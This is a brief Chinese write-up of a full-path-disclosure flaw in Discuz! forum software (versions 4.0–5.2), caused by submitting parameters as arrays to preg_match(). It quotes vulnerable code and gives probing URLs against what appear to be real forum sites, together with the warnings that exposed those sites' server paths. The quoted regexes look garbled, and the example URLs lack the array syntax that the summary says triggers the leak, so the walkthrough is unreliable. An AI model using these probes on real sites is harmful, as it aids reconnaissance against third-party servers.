Discuz论坛爆物理路径原理

受影响版本

Discuz!5.2
Discuz!5.1
Discuz!4.1
Discuz!4.0
.............

1.common.inc.php问题代码207行

 

.....
$navtitle = $navigation = '';
$extra = isset($extra) && preg_match("/^+$/i", $extra) ? $extra : '';
$tpp = intval(empty($_DSESSION) ? $topicperpage : $_DSESSION);
$ppp = intval(empty($_DSESSION) ? $postperpage : $_DSESSION);
.......

提交：

http://www.discuz.net/post.php?action=newthread&fid=32&extra=page%3D1

返回

 

Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/common.inc.php on line 209

 

 

2.依然是extra数组的问题

提交：

http://bbs.cnbct.org/viewthread.php?tid=316&pid=1453&page=1&extra=page%3D1#pid1453

返回

 

Warning: preg_match() expects parameter 2 to be string, array given in

 

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php on line 206
?
Warning: Cannot modify header information - headers already sent by (output started at

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php:206) in

/home/.cattia/bct/bbs.cnbct.org/include/global.func.php on line 139

 

 

3.global.func.php问题代码306行

 

function ispage($number) {
return !empty($number) && preg_match ("/^(+)$/", $number);
}

 

提交：

http://www.discuz.net/viewthread.php?tid=316&pid=1453&page=1&extra=page%3D1#pid1453

返回

 

Warning: preg_match() expects parameter 2 to be string, array given in

 

/home/www/wwwroot/www.discuz.net/include/global.func.php on line 306

 

 

总结

当把变量当成数组提交时，如果不存在该数组，但存在变量，后面的preg_match()正则表达式匹配不了，这样就出现了绝对路径